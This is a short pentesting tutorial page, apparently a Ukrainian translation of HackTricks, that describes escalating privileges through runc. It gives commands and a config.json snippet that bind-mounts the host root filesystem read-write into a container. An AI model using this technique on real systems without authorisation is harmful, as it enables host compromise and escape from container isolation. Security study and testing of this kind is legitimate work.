RunC Privilege Escalation

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Основна інформація

Якщо ви хочете дізнатися більше про runc, перегляньте наступну сторінку:

page2375, 2376 Pentesting Docker

PE

Якщо ви виявите, що runc встановлено на хості, ви можете запустити контейнер, монтувавши кореневу папку хоста.

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

Це не завжди буде працювати, оскільки типова операція runc - це запуск в якості root, тому запуск його як непривілейованого користувача просто не може працювати (якщо у вас немає конфігурації без root). Зробити конфігурацію без root типовою не є загалом гартою ідеєю, оскільки в без root контейнерах є кілька обмежень, які не застосовуються за межами без root контейнерів.

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated